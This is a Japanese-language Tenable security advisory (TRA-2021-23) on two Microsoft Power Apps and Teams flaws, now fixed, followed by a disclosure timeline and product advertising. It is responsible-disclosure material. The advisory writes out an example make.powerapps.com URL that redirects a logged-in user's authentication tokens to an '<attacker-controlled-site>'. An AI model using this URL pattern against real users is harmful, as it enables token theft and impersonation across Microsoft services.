Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Microsoft Power Apps (apps.powerapps.com、make.powerapps.com) に発見された複数の脆弱性

概要

apps.powerapps.com/teams/makerportal makerportalUrl パラメーターにおける不十分な入力検証

apps.powerapps.com/teams/makerportal にある makerPortalUrl パラメーターが供給された URL を十分に検証しない

悪意のある攻撃者がこの欠陥を利用して Microsoft Teams のタブに偽のコンテンツを掲載してユーザーの認証トークンを盗むことができる。

tokens for graph.make.powerapps.com と api.powerapps.com が使うユーザー認証トークンの盗取

make.powerapps.com にログオンしているユーザーが、次のような形式のページにアクセスすると、

https://make.powerapps.com/teams/powerapps/acquire/mscrm.test/status/https%3a%2f%2f<attacker-controlled-site>

そのユーザーの graph.make.powerapps.comapi.powerapps.com のための認証用トークンが攻撃者がコントロールするサイトに漏洩される。

悪意のある攻撃者はこの欠陥を利用して、他の複数の認証用トークンを盗み、ユーザーになりすまして複数の Microsoft サービスにリクエストを送信することができる。

ソリューション

この欠陥は Microsoft により修正済み。

公開までの時系列

2021/3/26 - Microsoft Security Response Center (MSRC) に脆弱性が報告される
2021/3/30 - MSRC が脆弱性を確認
2021/4/15 - Tenable が情報を催促。MSRC は調査中と回答
2021/4/27 - 入力の検証の問題は修正されたことを Tenable が明記。手順に従い、本件は公開されることになので、Microsoft に確認を要請
2021/5/19 - Tenable が再び MSRC に確認を依頼。問題が修正されていないという根拠がなければ、欠陥は公開されることを明記
2021/5/11 - MSRC は修正が確認できるまで公開を延期するようTenableに要請
2021/5/11 - 他にも問題があ、るまたは公開を延期すべきその他の理由がある場合は、週末までに確認するよう、Tenable が MSRC に要請
2021/5/13 - Tenable が記録された修正方法を回避する手段があるかもしれないことを発見して報告。MSRC が問題の修正と回避手段の対処を確認するまで公開を延期することに同意
2021/6/11 - 入力検証の問題は修正されたことを MSRC が確認
2021/6/24 - 認証トークンの開示問題が修正されたことを MSRC が確認

TRA アドバイザリで報告する情報は、すべて「生」で提供され、商品としてまたは特定の目的に適していることを暗示する保証や、完成度、精度、適時性の保証などを含むいかなる保証もありません。実際のまたは潜在的なセキュリティ上のいかなる脆弱性も、その影響の評価責任は個人と組織にあります。

Tenable は製品のセキュリティと真剣に取り組んでいます。当社の製品に脆弱性を発見されたと思われる場合には、お客様を保護するために、共同で素早く解決するようご協力をお願いいたします。 Tenable はそのような報告には迅速に対応し、リサーチャーと連携して短期間でソリューションを提供することを方針としています。

脆弱性情報の報告の方法について詳しくは、本ウェブサイトの Vulnerability Reporting Guidelines のページをご覧ください。

本アドバイザリに関するご質問、修正点などは、次のアドレスまで E メールでご連絡いただけるようお願いいたします。 [email protected]

リスク情報 :

Tenable Advisory ID
TRA-2021-23
Credit

Evan Grant

Affected Products
Microsoft Power Apps
 Microsoft Teams
リスクファクター

アドバイザリの時系列

2021/6/14 - アドバイザリ初版の発行日
2021/6/24 - 認証トークンの公開に絡む問題の詳細を追加
tenable.io

最新のクラウドベースの脆弱性管理プラットフォームにフルアクセスし、これまでにない精度で全資産の表示および追跡が可能です。

Tenable.cs Cloud Security トライアルには Tenable.io Vulnerability Management、Tenable Lumin、Tenable.io Web Application Scanning も含まれています。

tenable.io 購入

最新のクラウドベースの脆弱性管理プラットフォームの全機能にアクセスして、これまでにない精度で全ての資産を確認、追跡しましょう。 年間サブスクリプションをご購入ください。

65 資産

サブスクリプションオプションを選択してください。

今すぐ購入する

Nessus Professional を無料で試す

7 日間無料

Nessus® は、最も包括的な脆弱性スキャナーです。Nessus Professional は脆弱性のスキャンプロセスを自動化し、コンプライアンスサイクルを短縮し、お客様の IT チームが専念して活動できるようにします。

Nessus Professionalを購入する

Nessus® は、最も包括的な脆弱性スキャナーです。Nessus Professional は脆弱性のスキャンプロセスを自動化し、コンプライアンスサイクルを短縮し、お客様の IT チームが専念して活動できるようにします。

複数年ライセンスをご購入いただくと割引が適用されます。拡張サポートを追加すると、24 時間x365 日、電話、コミュニティ、チャットサポートにアクセスできます。

ライセンスをお選びください

複数年ライセンスをご購入いただくと割引が適用されます。

サポートとトレーニングを追加

Tenable.io

最新のクラウドベースの脆弱性管理プラットフォームにフルアクセスし、これまでにない精度で全資産の表示および追跡が可能です。

Tenable.cs Cloud Security トライアルには Tenable.io Vulnerability Management、Tenable Lumin、Tenable.io Web Application Scanning も含まれています。

Tenable.io を購入する

最新のクラウドベースの脆弱性管理プラットフォームの全機能にアクセスして、これまでにない精度で全ての資産を確認、追跡しましょう。 年間サブスクリプションをご購入ください。

65 資産

サブスクリプションオプションを選択してください。

今すぐ購入する

Tenable.io Web Application Scanningを試す

Tenable.ioプラットフォームの一部として最新のアプリケーション用に設計された、最新のウエブアプリケーションのスキャンサービスの全機能にアクセス可能です。手作業による労力や重大なウエブアプリケーションの中断なしに、脆弱性のオンラインポートフォリオを安全に高精度でスキャンします。 今すぐサインアップしてください。

Tenable.cs Cloud Security トライアルには Tenable.io Vulnerability Management、Tenable Lumin、Tenable.io Web Application Scanning も含まれています。

Tenable.io Web Application Scanningを購入する

最新のクラウドベースの脆弱性管理プラットフォームの全機能にアクセスして、これまでにない精度で全ての資産を確認、追跡しましょう。 年間サブスクリプションをご購入ください。

5 FQDN

3,578ドル

今すぐ購入する

Tenable.io Container Securityを試す

脆弱性管理プラットフォームに統合された唯一のコンテナセキュリティ製品の全機能にアクセス可能です。コンテナイメージの脆弱性、マルウェア、ポリシー違反を監視継続的インテグレーション/継続的デリバリー(CI / CD)システムと統合し、DevOps プラクティス、セキュリティ強化、および企業のポリシーコンプライアンスをサポートします。

Tenable.io Container Securityを購入する

Tenable.ioのContainer Securityは、ビルドプロセスと統合することにより、コンテナイメージのセキュリティ(脆弱性、マルウェア、ポリシー違反など)を可視化し、シームレスかつ安全なDevOpsプロセスを実現します。

Tenable Lumin を試用する

Tenable Lumin を使用して、Cyber Exposure を可視化および調査し、リスクの軽減を追跡し、競合他社に対してベンチマークしましょう。

Tenable.cs Cloud Security トライアルには Tenable.io Vulnerability Management、Tenable Lumin、Tenable.io Web Application Scanning も含まれています。

Tenable Lumin を購入する

Tenableの担当者にお問い合わせいただき、企業全体に対するインサイトを得て、サイバーリスクを管理する上で Lumin がいかに役立つかについて、Tenable の営業担当者までお問い合わせください。

Tenable.cs を試してみる

製品のすべての機能にアクセスして、クラウドインフラの設定ミスを検出、修正して、実行段階の脆弱性を表示できます。今すぐ無料トライアルにご登録ください。

Tenable.cs Cloud Security トライアルには Tenable.io Vulnerability Management、Tenable Lumin、Tenable.io Web Application Scanning も含まれています。

営業担当者に問い合わせて Tenable.cs

Tenable.cs Cloud Security について詳しくは営業担当者にお問い合わせください。クラウドアカウントのオンボーディングは簡単で、数分でクラウドの設定ミスと脆弱性が把握できます。

Nessus Expert を無料で試す

7 日間無料

最新のアタックサーフェス用に構築された Nessus Expert を使用すると、拡大された領域が可視化でき、IT やクラウド資産に潜む脆弱性から企業を保護できます。

すでに Nessus Professional をご使用ですか?
Nessus Expert にアップグレードすると、7 日間無料でご利用いただけます。

Nessus Expert を購入する

最新のアタックサーフェス用に構築された Nessus Expert を使用すると、拡大された領域が可視化でき、IT やクラウド資産に潜む脆弱性から企業を保護できます。

ライセンスをお選びください

プロモーション価格の有効期間が12月末日まで延長されました。
複数年ライセンスの場合、よりお求めやすい価格でご購入いただけます。

サポートとトレーニングを追加